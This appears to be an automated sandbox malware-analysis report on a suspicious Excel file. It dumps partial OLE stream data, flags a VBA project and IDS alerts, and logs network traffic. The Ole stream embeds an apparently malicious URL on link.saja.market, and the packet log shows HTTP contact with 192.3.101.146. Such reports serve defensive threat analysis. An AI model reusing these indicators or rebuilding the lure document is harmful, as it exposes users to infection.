                                          Stream Path:MBD00CB8BB9/\x5SummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:31156
                                          Entropy:3.1876994904322484
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . y . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K e n n y C h e u n g . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . m . . . @ . . . . _ ~ . \\ S . @ . . . . . . . . . . . . G . . . x . . . . . . . . 0 . . . . . . . . . . T < . . . . . . . . . . . . . . & .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 79 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 70 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 11 00 00 00 c4 00 00 00
                                          General
                                          Stream Path:MBD00CB8BB9/MBD00320C7F/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.219515110876372
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          General
                                          Stream Path:MBD00CB8BB9/MBD00320C7F/Package
                                          CLSID:
                                          File Type:Microsoft Excel 2007+
                                          Stream Size:613686
                                          Entropy:7.989056691241232
                                          Base64 Encoded:True
                                          Data ASCII:P K . . . . . . . . . . ! . . X . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 1a 58 13 82 c0 01 00 00 90 07 00 00 13 00 bb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 b7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          General
                                          Stream Path:MBD00CB8BB9/MBD00321A49/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.219515110876372
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          General
                                          Stream Path:MBD00CB8BB9/MBD00321A49/Package
                                          CLSID:
                                          File Type:Microsoft Excel 2007+
                                          Stream Size:13665
                                          Entropy:7.1661074658165225
                                          Base64 Encoded:True
                                          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 9d a8 db 7e 01 00 00 85 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          General
                                          Stream Path:MBD00CB8BB9/Workbook
                                          CLSID:
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Stream Size:392615
                                          Entropy:7.73377528201003
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . h : . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . .
                                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          General
                                          Stream Path:MBD00CB8BBA/\x1Ole
                                          CLSID:
                                          File Type:data
                                          Stream Size:672
                                          Entropy:5.721882745142486
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . f G . ] . . . . . . . . . . . . : . . . y . . . K . 6 . . . h . t . t . p . s . : . / . / . l . i . n . k . . . s . a . j . a . . . m . a . r . k . e . t . / . L . U . V . L . Q . 8 . X . 6 . l . 6 . ? . & . p . e . a . k . = . s . o . u . r . & . e . a . r . d . r . u . m . . . [ % . v C . . L 0 R 5 . . Q # ; ` . F & . p . b # K ` D ? . 2 . . . . . . | @ . - : D l < . . . T . : ~ . . : . . ^ . R . ; W n . . . Y R r B . . a a q p . " . . y { N ) . . / % a . t h d . k . = . > . . . . . . . . . .
                                          Data Raw:01 00 00 02 11 0a e3 66 47 dd 18 5d 00 00 00 00 00 00 00 00 00 00 00 00 3a 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 36 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 69 00 6e 00 6b 00 2e 00 73 00 61 00 6a 00 61 00 2e 00 6d 00 61 00 72 00 6b 00 65 00 74 00 2f 00 4c 00 55 00 56 00 4c 00 51 00 38 00 58 00 36 00 6c 00 36 00 3f 00 26 00 70 00 65 00 61 00
                                          General
                                          Stream Path:Workbook
                                          CLSID:
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Stream Size:96235
                                          Entropy:7.991575064573711
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . @ } M V / L A k F r . ; Z [ F . 8 e . } 1 ! . . B . % . . . . . . . { . . . \\ . p . ( . 3 Q 7 [ C 5 q r u V ^ ; E < . \\ 8 { e q q q . . > f . y t U . t r I _ ` r u . c * ( . 4 m . W . . . 3 9 } . _ 2 . ' N B . . . a . . . O . . . = . . . > 8 l . 0 . . . r E . { . . . C . . . . . . . . . . L A . . . . > . . . . . . . . h = . . . * w + y 2 c @ . . . O . . . ' " . . . w N . . . . . . . . _ . . . Q 1 . . . . E x . B ' ~ z C ; 7 g I . = . 1 . . . . . =
                                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 0f ec 40 97 7d 4d 56 2f c9 4c ac 41 6b 46 88 72 16 3b 8e 9a f4 5a 5b be 46 9b a3 17 90 84 38 d0 65 c5 c5 04 7d 31 d7 21 0b 14 42 1a e9 e0 25 a4 e1 00 02 00 b0 04 c1 00 02 00 7b c5 e2 00 00 00 5c 00 70 00 28 eb d1 19 b0 33 b4 a7 b7 51 97 ff 37 5b f3 b9 43 35 71 72 75 56 5e 3b 45 3c 9f b0 0f 5c
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                                          CLSID:
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:529
                                          Entropy:5.255987895338394
                                          Base64 Encoded:True
                                          Data ASCII:I D = " { 8 3 D 3 0 D B 6 - 5 4 7 B - 4 1 8 4 - B B C B - D 8 F 6 A 4 7 E 7 E F 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 3 C 1 D 1 7 1 7 7 7 5 7 7 7 5 7
                                          Data Raw:49 44 3d 22 7b 38 33 44 33 30 44 42 36 2d 35 34 37 42 2d 34 31 38 34 2d 42 42 43 42 2d 44 38 46 36 41 34 37 45 37 45 46 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                          CLSID:
                                          File Type:data
                                          Stream Size:104
                                          Entropy:3.0488640812019017
                                          Base64 Encoded:False
                                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                          CLSID:
                                          File Type:data
                                          Stream Size:2644
                                          Entropy:3.9835394684377627
                                          Base64 Encoded:False
                                          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                          CLSID:
                                          File Type:data
                                          Stream Size:553
                                          Entropy:6.356415315211564
                                          Base64 Encoded:True
                                          Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . - & i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                          Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 2d 26 ef 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                          Network Behavior

                                          Download Network PCAP: filteredfull

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2025-03-17T09:29:37.545969+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.124976413.107.246.60443TCP
                                          2025-03-17T09:29:42.777526+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.124976513.107.246.60443TCP
                                          2025-03-17T09:29:42.778108+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.124976613.107.246.60443TCP

                                          Network Port Distribution

                                          • Total Packets: 219
                                          • 443 (HTTPS)
                                          • 53 (DNS)
                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 17, 2025 09:29:27.789061069 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:27.789122105 CET443497623.39.153.44192.168.2.12
                                          Mar 17, 2025 09:29:27.789207935 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:27.789545059 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:27.789570093 CET443497623.39.153.44192.168.2.12
                                          Mar 17, 2025 09:29:29.024199963 CET443497623.39.153.44192.168.2.12
                                          Mar 17, 2025 09:29:29.024269104 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:29.028831005 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:29.028847933 CET443497623.39.153.44192.168.2.12
                                          Mar 17, 2025 09:29:29.029095888 CET443497623.39.153.44192.168.2.12
                                          Mar 17, 2025 09:29:29.029150009 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:29.035264015 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:29.076335907 CET443497623.39.153.44192.168.2.12
                                          Mar 17, 2025 09:29:29.335258007 CET443497623.39.153.44192.168.2.12
                                          Mar 17, 2025 09:29:29.335397959 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:29.335398912 CET443497623.39.153.44192.168.2.12
                                          Mar 17, 2025 09:29:29.335438967 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:29.341326952 CET49762443192.168.2.123.39.153.44
                                          Mar 17, 2025 09:29:29.341351986 CET443497623.39.153.44192.168.2.12
                                          Mar 17, 2025 09:29:29.343421936 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.348140001 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.348207951 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.348325014 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.352998018 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839521885 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839536905 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839549065 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839575052 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.839607000 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.839632034 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839643955 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839656115 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839667082 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.839672089 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839684963 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839693069 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.839698076 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839709997 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.839720964 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.839737892 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.844269037 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.844283104 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.844311953 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.844336987 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.844481945 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.844491959 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.844516993 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.844533920 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:29.930232048 CET8049763192.3.101.146192.168.2.12
                                          Mar 17, 2025 09:29:29.930314064 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:30.080862999 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:30.080862999 CET4976380192.168.2.12192.3.101.146
                                          Mar 17, 2025 09:29:36.912585974 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:36.912617922 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:36.912789106 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:36.913229942 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:36.913247108 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.545737982 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.545969009 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.547265053 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.547286987 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.547571898 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.548795938 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.592336893 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.647871017 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.647895098 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.647908926 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.647965908 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.647995949 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.648037910 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.733109951 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.733138084 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.733201981 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.733234882 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.733417988 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.735414028 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.735436916 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.735481024 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.735490084 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.735536098 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.818497896 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.818522930 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.818597078 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.818633080 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.818814993 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.819437981 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.819457054 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.819530010 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.819551945 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.819658041 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.821197033 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.821214914 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.821283102 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.821300983 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.821369886 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.822134018 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.822153091 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.822199106 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.822212934 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.822226048 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.822246075 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.905179977 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.905206919 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.905260086 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.905292034 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.905308008 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.905375957 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.905658007 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.905677080 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.905710936 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.905719042 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.905745983 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.905770063 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.906389952 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.906411886 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.906454086 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.906461954 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.906502008 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.907365084 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.907382965 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.907423019 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.907429934 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.907464027 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.908255100 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.908274889 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.908320904 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.908329010 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.908364058 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.908370018 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.909207106 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.909225941 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.909291029 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.909298897 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.909334898 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.910026073 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.910043001 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.910093069 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.910099983 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.910136938 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.991436958 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.991466045 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.991581917 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.991616964 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.991638899 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.992209911 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.992233992 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.992276907 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.992286921 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.992295980 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.992805958 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.992826939 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.992857933 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.992866039 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.992892027 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.992914915 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.993438959 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.993457079 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.993501902 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.993515015 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.994311094 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.994334936 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.994365931 CET49764443192.168.2.1213.107.246.60
                                          Mar 17, 2025 09:29:37.994375944 CET4434976413.107.246.60192.168.2.12
                                          Mar 17, 2025 09:29:37.994385958 CET49764443192.168.2.1213.107.246.60
